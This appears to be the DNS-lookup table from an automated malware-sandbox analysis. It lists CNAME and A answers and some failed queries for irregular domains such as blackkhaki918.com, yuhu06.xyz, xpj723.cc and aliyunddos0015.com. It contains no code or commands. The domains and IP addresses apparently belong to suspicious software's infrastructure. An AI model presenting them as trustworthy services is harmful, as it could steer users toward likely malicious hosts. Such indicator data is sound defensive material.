                                                                                                                                                          Jun 10, 2024 00:40:45.870451927 CEST1.1.1.1192.168.2.50x86aaNo error (0)ocsapi-aka.blackkhaki918.comdcr053r0lmcyq.cloudfront.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:45.870451927 CEST1.1.1.1192.168.2.50x86aaNo error (0)dcr053r0lmcyq.cloudfront.net3.165.113.62A (IP address)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:45.870451927 CEST1.1.1.1192.168.2.50x86aaNo error (0)dcr053r0lmcyq.cloudfront.net3.165.113.40A (IP address)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:45.870451927 CEST1.1.1.1192.168.2.50x86aaNo error (0)dcr053r0lmcyq.cloudfront.net3.165.113.92A (IP address)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:45.870451927 CEST1.1.1.1192.168.2.50x86aaNo error (0)dcr053r0lmcyq.cloudfront.net3.165.113.94A (IP address)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:45.918982029 CEST1.1.1.1192.168.2.50xcc31No error (0)ocsapi-aka.blackkhaki918.comdcr053r0lmcyq.cloudfront.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:46.057967901 CEST1.1.1.1192.168.2.50x5b30No error (0)brhrjf.yuhu06.xyzbrhrjf.yuhu06.xyz-1.download.ks-cdn.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:46.057967901 CEST1.1.1.1192.168.2.50x5b30No error (0)brhrjf.yuhu06.xyz-1.download.ks-cdn.coml5.gslb.ksyuncdn.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:46.231234074 CEST1.1.1.1192.168.2.50x6949No error (0)brhrjf.yuhu06.xyzbrhrjf.yuhu06.xyz-1.download.ks-cdn.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:46.231234074 CEST1.1.1.1192.168.2.50x6949No error (0)brhrjf.yuhu06.xyz-1.download.ks-cdn.coml5.gslb.ksyuncdn.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:46.231234074 CEST1.1.1.1192.168.2.50x6949No error (0)l5.gslb.ksyuncdn.com183.61.243.1A (IP address)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:46.231234074 CEST1.1.1.1192.168.2.50x6949No error (0)l5.gslb.ksyuncdn.com218.60.21.6A (IP address)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:46.231234074 CEST1.1.1.1192.168.2.50x6949No error (0)l5.gslb.ksyuncdn.com124.225.141.5A (IP address)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:46.231234074 CEST1.1.1.1192.168.2.50x6949No error (0)l5.gslb.ksyuncdn.com175.6.254.65A (IP address)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:46.231234074 CEST1.1.1.1192.168.2.50x6949No error (0)l5.gslb.ksyuncdn.com118.112.233.9A (IP address)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:46.231234074 CEST1.1.1.1192.168.2.50x6949No error (0)l5.gslb.ksyuncdn.com183.131.56.5A (IP address)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:46.231234074 CEST1.1.1.1192.168.2.50x6949No error (0)l5.gslb.ksyuncdn.com113.16.211.3A (IP address)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:46.231234074 CEST1.1.1.1192.168.2.50x6949No error (0)l5.gslb.ksyuncdn.com42.56.77.10A (IP address)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:46.231234074 CEST1.1.1.1192.168.2.50x6949No error (0)l5.gslb.ksyuncdn.com183.61.168.1A (IP address)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:46.231307983 CEST1.1.1.1192.168.2.50xd7dNo error (0)brhrjf.yuhu06.xyzbrhrjf.yuhu06.xyz-1.download.ks-cdn.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:46.231307983 CEST1.1.1.1192.168.2.50xd7dNo error (0)brhrjf.yuhu06.xyz-1.download.ks-cdn.coml5.gslb.ksyuncdn.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:46.231307983 CEST1.1.1.1192.168.2.50xd7dNo error (0)l5.gslb.ksyuncdn.com183.61.243.1A (IP address)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:46.231307983 CEST1.1.1.1192.168.2.50xd7dNo error (0)l5.gslb.ksyuncdn.com218.60.21.6A (IP address)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:46.231307983 CEST1.1.1.1192.168.2.50xd7dNo error (0)l5.gslb.ksyuncdn.com124.225.141.5A (IP address)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:46.231307983 CEST1.1.1.1192.168.2.50xd7dNo error (0)l5.gslb.ksyuncdn.com175.6.254.65A (IP address)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:46.231307983 CEST1.1.1.1192.168.2.50xd7dNo error (0)l5.gslb.ksyuncdn.com118.112.233.9A (IP address)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:46.231307983 CEST1.1.1.1192.168.2.50xd7dNo error (0)l5.gslb.ksyuncdn.com183.131.56.5A (IP address)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:46.231307983 CEST1.1.1.1192.168.2.50xd7dNo error (0)l5.gslb.ksyuncdn.com113.16.211.3A (IP address)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:46.231307983 CEST1.1.1.1192.168.2.50xd7dNo error (0)l5.gslb.ksyuncdn.com42.56.77.10A (IP address)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:46.231307983 CEST1.1.1.1192.168.2.50xd7dNo error (0)l5.gslb.ksyuncdn.com183.61.168.1A (IP address)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:46.332370996 CEST1.1.1.1192.168.2.50x6513No error (0)ocsapi-aws.bakeddove.comd7xy0886tqf1j.cloudfront.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:46.332370996 CEST1.1.1.1192.168.2.50x6513No error (0)d7xy0886tqf1j.cloudfront.net18.66.147.121A (IP address)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:46.332370996 CEST1.1.1.1192.168.2.50x6513No error (0)d7xy0886tqf1j.cloudfront.net18.66.147.35A (IP address)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:46.332370996 CEST1.1.1.1192.168.2.50x6513No error (0)d7xy0886tqf1j.cloudfront.net18.66.147.91A (IP address)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:46.332370996 CEST1.1.1.1192.168.2.50x6513No error (0)d7xy0886tqf1j.cloudfront.net18.66.147.55A (IP address)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:46.336963892 CEST1.1.1.1192.168.2.50x80c1No error (0)ocsapi-aws.bakeddove.comd7xy0886tqf1j.cloudfront.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:46.832246065 CEST1.1.1.1192.168.2.50x6fa0No error (0)e933002.com38.174.148.235A (IP address)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:46.832246065 CEST1.1.1.1192.168.2.50x6fa0No error (0)e933002.com38.174.148.234A (IP address)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:47.818032026 CEST1.1.1.1192.168.2.50x1bd6No error (0)brhrjf.yuhu06.xyzbrhrjf.yuhu06.xyz-1.download.ks-cdn.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:47.818032026 CEST1.1.1.1192.168.2.50x1bd6No error (0)brhrjf.yuhu06.xyz-1.download.ks-cdn.coml5.gslb.ksyuncdn.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:48.284348965 CEST1.1.1.1192.168.2.50x8edbNo error (0)xpj723.cc202.61.87.224A (IP address)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:48.284348965 CEST1.1.1.1192.168.2.50x8edbNo error (0)xpj723.cc202.61.87.219A (IP address)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:49.016709089 CEST1.1.1.1192.168.2.50x70e8Name error (3)_1886._https.wssa-371.laorrey.comnonenone65IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:49.318259954 CEST1.1.1.1192.168.2.50xc511Name error (3)wssa-371.laorrey.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:49.337987900 CEST1.1.1.1192.168.2.50x46d5Name error (3)wssa-371.laorrey.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:50.156908989 CEST1.1.1.1192.168.2.50x9831No error (0)zb-qq.gzjqwlkj.comzb-qq.gzjqwlkj.com.cdn.dnsv1.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:50.156908989 CEST1.1.1.1192.168.2.50x9831No error (0)zb-qq.gzjqwlkj.com.cdn.dnsv1.com36s0iija.slt.sched.intlscdn.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:50.245846987 CEST1.1.1.1192.168.2.50x730aName error (3)_1886._https.wssa-371.laorrey.comnonenone65IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:50.254070044 CEST1.1.1.1192.168.2.50x4233Name error (3)wssa-371.laorrey.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:50.278629065 CEST1.1.1.1192.168.2.50xe311No error (0)ocsapi1961.hydqef.com7znfi17mcwot775b.aliyunddos0015.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:50.278629065 CEST1.1.1.1192.168.2.50xe311No error (0)7znfi17mcwot775b.aliyunddos0015.comocsapi1961.hydqef.com.w.cdngslb.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:50.278629065 CEST1.1.1.1192.168.2.50xe311No error (0)ocsapi1961.hydqef.com.w.cdngslb.com163.181.92.243A (IP address)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:50.278629065 CEST1.1.1.1192.168.2.50xe311No error (0)ocsapi1961.hydqef.com.w.cdngslb.com163.181.131.228A (IP address)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:50.278629065 CEST1.1.1.1192.168.2.50xe311No error (0)ocsapi1961.hydqef.com.w.cdngslb.com47.246.46.248A (IP address)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:50.278629065 CEST1.1.1.1192.168.2.50xe311No error (0)ocsapi1961.hydqef.com.w.cdngslb.com163.181.92.241A (IP address)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:50.278629065 CEST1.1.1.1192.168.2.50xe311No error (0)ocsapi1961.hydqef.com.w.cdngslb.com163.181.92.250A (IP address)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:50.278629065 CEST1.1.1.1192.168.2.50xe311No error (0)ocsapi1961.hydqef.com.w.cdngslb.com163.181.92.249A (IP address)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:50.278629065 CEST1.1.1.1192.168.2.50xe311No error (0)ocsapi1961.hydqef.com.w.cdngslb.com163.181.92.225A (IP address)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:50.278629065 CEST1.1.1.1192.168.2.50xe311No error (0)ocsapi1961.hydqef.com.w.cdngslb.com163.181.92.245A (IP address)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:50.278629065 CEST1.1.1.1192.168.2.50xe311No error (0)ocsapi1961.hydqef.com.w.cdngslb.com163.181.92.246A (IP address)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:50.278629065 CEST1.1.1.1192.168.2.50xe311No error (0)ocsapi1961.hydqef.com.w.cdngslb.com163.181.92.226A (IP address)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:50.281232119 CEST1.1.1.1192.168.2.50x4a42Name error (3)_1186._https.wssa-301.shiwanxin.comnonenone65IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:50.324403048 CEST1.1.1.1192.168.2.50xad6cNo error (0)zb-hw.czwygs.comzb-hw.czwygs.com.a5caa4d4.cdnhwcgqa21.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:50.324403048 CEST1.1.1.1192.168.2.50xad6cNo error (0)zb-hw.czwygs.com.a5caa4d4.cdnhwcgqa21.comhcdnw.ovc.sme.cdnhwccmz121.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:50.324403048 CEST1.1.1.1192.168.2.50xad6cNo error (0)hcdnw.ovc.sme.cdnhwccmz121.com90.84.161.22A (IP address)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:50.324403048 CEST1.1.1.1192.168.2.50xad6cNo error (0)hcdnw.ovc.sme.cdnhwccmz121.com223.121.15.24A (IP address)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:50.324403048 CEST1.1.1.1192.168.2.50xad6cNo error (0)hcdnw.ovc.sme.cdnhwccmz121.com23.90.149.106A (IP address)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:50.333515882 CEST1.1.1.1192.168.2.50x7a77No error (0)wssa-301.shiwanxin.comwssa-301.shiwanxin.com.cdn20.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:50.333515882 CEST1.1.1.1192.168.2.50x7a77No error (0)wssa-301.shiwanxin.com.cdn20.com163.171.137.177A (IP address)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:50.342608929 CEST1.1.1.1192.168.2.50x4f2dNo error (0)zb1-hw.qectyoua.comzb1-hw.qectyoua.com.a5caa4d4.cdnhwcgqa21.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:50.342608929 CEST1.1.1.1192.168.2.50x4f2dNo error (0)zb1-hw.qectyoua.com.a5caa4d4.cdnhwcgqa21.comhcdnw.ovc.sme.cdnhwccmz121.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:50.498167038 CEST1.1.1.1192.168.2.50x13c7No error (0)zb-qq.gzjqwlkj.comzb-qq.gzjqwlkj.com.cdn.dnsv1.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:50.498167038 CEST1.1.1.1192.168.2.50x13c7No error (0)zb-qq.gzjqwlkj.com.cdn.dnsv1.com36s0iija.slt.sched.intlscdn.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:50.498167038 CEST1.1.1.1192.168.2.50x13c7No error (0)36s0iija.slt.sched.intlscdn.com54.150.37.130A (IP address)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:50.498167038 CEST1.1.1.1192.168.2.50x13c7No error (0)36s0iija.slt.sched.intlscdn.com211.152.148.88A (IP address)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:50.498167038 CEST1.1.1.1192.168.2.50x13c7No error (0)36s0iija.slt.sched.intlscdn.com101.33.17.55A (IP address)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:50.498167038 CEST1.1.1.1192.168.2.50x13c7No error (0)36s0iija.slt.sched.intlscdn.com52.76.116.62A (IP address)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:50.498167038 CEST1.1.1.1192.168.2.50x13c7No error (0)36s0iija.slt.sched.intlscdn.com43.152.14.32A (IP address)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:50.498167038 CEST1.1.1.1192.168.2.50x13c7No error (0)36s0iija.slt.sched.intlscdn.com43.132.64.28A (IP address)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:50.498167038 CEST1.1.1.1192.168.2.50x13c7No error (0)36s0iija.slt.sched.intlscdn.com52.220.25.48A (IP address)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:50.498167038 CEST1.1.1.1192.168.2.50x13c7No error (0)36s0iija.slt.sched.intlscdn.com211.152.148.109A (IP address)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:50.498167038 CEST1.1.1.1192.168.2.50x13c7No error (0)36s0iija.slt.sched.intlscdn.com122.10.255.44A (IP address)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:50.498167038 CEST1.1.1.1192.168.2.50x13c7No error (0)36s0iija.slt.sched.intlscdn.com101.33.24.11A (IP address)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:50.498167038 CEST1.1.1.1192.168.2.50x13c7No error (0)36s0iija.slt.sched.intlscdn.com129.227.190.50A (IP address)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:50.498167038 CEST1.1.1.1192.168.2.50x13c7No error (0)36s0iija.slt.sched.intlscdn.com43.201.120.160A (IP address)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:50.498167038 CEST1.1.1.1192.168.2.50x13c7No error (0)36s0iija.slt.sched.intlscdn.com15.188.236.70A (IP address)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:50.498167038 CEST1.1.1.1192.168.2.50x13c7No error (0)36s0iija.slt.sched.intlscdn.com43.152.25.102A (IP address)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:50.498167038 CEST1.1.1.1192.168.2.50x13c7No error (0)36s0iija.slt.sched.intlscdn.com43.152.23.34A (IP address)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:50.503402948 CEST1.1.1.1192.168.2.50x10e9No error (0)zb1-hw.qectyoua.comzb1-hw.qectyoua.com.a5caa4d4.cdnhwcgqa21.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:50.503402948 CEST1.1.1.1192.168.2.50x10e9No error (0)zb1-hw.qectyoua.com.a5caa4d4.cdnhwcgqa21.comhcdnw.ovc.sme.cdnhwccmz121.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:50.503402948 CEST1.1.1.1192.168.2.50x10e9No error (0)hcdnw.ovc.sme.cdnhwccmz121.com223.121.15.24A (IP address)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:50.503402948 CEST1.1.1.1192.168.2.50x10e9No error (0)hcdnw.ovc.sme.cdnhwccmz121.com23.90.149.106A (IP address)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:50.503402948 CEST1.1.1.1192.168.2.50x10e9No error (0)hcdnw.ovc.sme.cdnhwccmz121.com90.84.161.22A (IP address)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:50.567154884 CEST1.1.1.1192.168.2.50x2463No error (0)zb-hw.czwygs.comzb-hw.czwygs.com.a5caa4d4.cdnhwcgqa21.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:50.567154884 CEST1.1.1.1192.168.2.50x2463No error (0)zb-hw.czwygs.com.a5caa4d4.cdnhwcgqa21.comhcdnw.ovc.sme.cdnhwccmz121.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:50.616283894 CEST1.1.1.1192.168.2.50xc0e3No error (0)ocsapi1961.hydqef.com7znfi17mcwot775b.aliyunddos0015.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:50.616283894 CEST1.1.1.1192.168.2.50xc0e3No error (0)7znfi17mcwot775b.aliyunddos0015.comocsapi1961.hydqef.com.w.cdngslb.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:50.648260117 CEST1.1.1.1192.168.2.50x2166No error (0)xpj723.cc202.61.87.224A (IP address)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:50.648260117 CEST1.1.1.1192.168.2.50x2166No error (0)xpj723.cc202.61.87.219A (IP address)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:50.651027918 CEST1.1.1.1192.168.2.50x78afName error (3)_1586._https.wssa-341.dalianjrkj.comnonenone65IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:50.657414913 CEST1.1.1.1192.168.2.50xa361No error (0)wssa-341.dalianjrkj.comwssa-341.dalianjrkj.com.cdn20.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:50.657414913 CEST1.1.1.1192.168.2.50xa361No error (0)wssa-341.dalianjrkj.com.cdn20.com163.171.137.177A (IP address)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:50.698487043 CEST1.1.1.1192.168.2.50xf536No error (0)ahd-ocssn.qqxgo.coml7pmnx802xd4h452.aliyunddos0015.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:50.698487043 CEST1.1.1.1192.168.2.50xf536No error (0)l7pmnx802xd4h452.aliyunddos0015.com170.33.9.227A (IP address)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:50.888509989 CEST1.1.1.1192.168.2.50xe126No error (0)ahd-ocssn.qqxgo.coml7pmnx802xd4h452.aliyunddos0015.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:51.263473988 CEST1.1.1.1192.168.2.50x98a5No error (0)ocsapi-lc.tingmeikj.comjh03-site-18.cdn-ng.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:51.275022030 CEST1.1.1.1192.168.2.50xae40No error (0)ocsapi-lc.tingmeikj.comjh03-site-18.cdn-ng.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:51.275022030 CEST1.1.1.1192.168.2.50xae40No error (0)jh03-site-18.cdn-ng.net103.117.134.21A (IP address)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:52.019169092 CEST1.1.1.1192.168.2.50x3766No error (0)wns732.cc202.61.87.224A (IP address)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:52.019169092 CEST1.1.1.1192.168.2.50x3766No error (0)wns732.cc202.61.87.219A (IP address)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:52.350033045 CEST1.1.1.1192.168.2.50x80ecNo error (0)8vpfnx.eveday.me8vpfnx.eveday.me.download.ks-cdn.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:52.350033045 CEST1.1.1.1192.168.2.50x80ecNo error (0)8vpfnx.eveday.me.download.ks-cdn.coml5.gslb.ksyuncdn.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:52.616463900 CEST1.1.1.1192.168.2.50x2e73No error (0)zb-hw.czwygs.comzb-hw.czwygs.com.a5caa4d4.cdnhwcgqa21.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:52.616463900 CEST1.1.1.1192.168.2.50x2e73No error (0)zb-hw.czwygs.com.a5caa4d4.cdnhwcgqa21.comhcdnw.ovc.sme.cdnhwccmz121.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:52.695004940 CEST1.1.1.1192.168.2.50xa02aNo error (0)wssa-341.dalianjrkj.comwssa-341.dalianjrkj.com.cdn20.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:52.695004940 CEST1.1.1.1192.168.2.50xa02aNo error (0)wssa-341.dalianjrkj.com.cdn20.com163.171.137.177A (IP address)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:52.732533932 CEST1.1.1.1192.168.2.50x601eNo error (0)zb-hw.czwygs.comzb-hw.czwygs.com.a5caa4d4.cdnhwcgqa21.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:52.732533932 CEST1.1.1.1192.168.2.50x601eNo error (0)zb-hw.czwygs.com.a5caa4d4.cdnhwcgqa21.comhcdnw.ovc.sme.cdnhwccmz121.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:52.732533932 CEST1.1.1.1192.168.2.50x601eNo error (0)hcdnw.ovc.sme.cdnhwccmz121.com90.84.161.22A (IP address)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:52.732533932 CEST1.1.1.1192.168.2.50x601eNo error (0)hcdnw.ovc.sme.cdnhwccmz121.com223.121.15.24A (IP address)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:52.732533932 CEST1.1.1.1192.168.2.50x601eNo error (0)hcdnw.ovc.sme.cdnhwccmz121.com23.90.149.106A (IP address)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:52.733536959 CEST1.1.1.1192.168.2.50xeff9Name error (3)_1586._https.wssa-341.dalianjrkj.comnonenone65IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:53.232254982 CEST1.1.1.1192.168.2.50xceffNo error (0)ahd-ocssn.qqxgo.coml7pmnx802xd4h452.aliyunddos0015.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:53.232254982 CEST1.1.1.1192.168.2.50xceffNo error (0)l7pmnx802xd4h452.aliyunddos0015.com170.33.9.227A (IP address)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:53.263118982 CEST1.1.1.1192.168.2.50x15f7No error (0)ahd-ocssn.qqxgo.coml7pmnx802xd4h452.aliyunddos0015.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:53.298729897 CEST1.1.1.1192.168.2.50x1a33No error (0)zb-qq.gzjqwlkj.comzb-qq.gzjqwlkj.com.cdn.dnsv1.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:53.298729897 CEST1.1.1.1192.168.2.50x1a33No error (0)zb-qq.gzjqwlkj.com.cdn.dnsv1.com36s0iija.slt.sched.intlscdn.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:53.359597921 CEST1.1.1.1192.168.2.50x33a0No error (0)zb-qq.gzjqwlkj.comzb-qq.gzjqwlkj.com.cdn.dnsv1.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:53.359597921 CEST1.1.1.1192.168.2.50x33a0No error (0)zb-qq.gzjqwlkj.com.cdn.dnsv1.com36s0iija.slt.sched.intlscdn.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:53.359597921 CEST1.1.1.1192.168.2.50x33a0No error (0)36s0iija.slt.sched.intlscdn.com43.201.120.160A (IP address)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:53.359597921 CEST1.1.1.1192.168.2.50x33a0No error (0)36s0iija.slt.sched.intlscdn.com101.33.24.11A (IP address)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:53.359597921 CEST1.1.1.1192.168.2.50x33a0No error (0)36s0iija.slt.sched.intlscdn.com101.33.17.55A (IP address)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:53.359597921 CEST1.1.1.1192.168.2.50x33a0No error (0)36s0iija.slt.sched.intlscdn.com129.227.190.50A (IP address)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:53.359597921 CEST1.1.1.1192.168.2.50x33a0No error (0)36s0iija.slt.sched.intlscdn.com15.188.236.70A (IP address)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:53.359597921 CEST1.1.1.1192.168.2.50x33a0No error (0)36s0iija.slt.sched.intlscdn.com43.152.14.32A (IP address)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:53.359597921 CEST1.1.1.1192.168.2.50x33a0No error (0)36s0iija.slt.sched.intlscdn.com211.152.148.109A (IP address)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:53.359597921 CEST1.1.1.1192.168.2.50x33a0No error (0)36s0iija.slt.sched.intlscdn.com52.220.25.48A (IP address)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:53.359597921 CEST1.1.1.1192.168.2.50x33a0No error (0)36s0iija.slt.sched.intlscdn.com43.132.64.28A (IP address)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:53.359597921 CEST1.1.1.1192.168.2.50x33a0No error (0)36s0iija.slt.sched.intlscdn.com52.76.116.62A (IP address)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:53.359597921 CEST1.1.1.1192.168.2.50x33a0No error (0)36s0iija.slt.sched.intlscdn.com54.150.37.130A (IP address)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:53.359597921 CEST1.1.1.1192.168.2.50x33a0No error (0)36s0iija.slt.sched.intlscdn.com43.152.25.102A (IP address)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:53.359597921 CEST1.1.1.1192.168.2.50x33a0No error (0)36s0iija.slt.sched.intlscdn.com211.152.148.88A (IP address)IN (0x0001)false
                                                                                                                                                          Jun 10, 2024 00:40:53.359597921 CEST1.1.1.1192.168.2.50x33a0No error (0)36s0iija.slt.sched.intlscdn.com43.152.23.34A (IP address)IN (0x0001)false
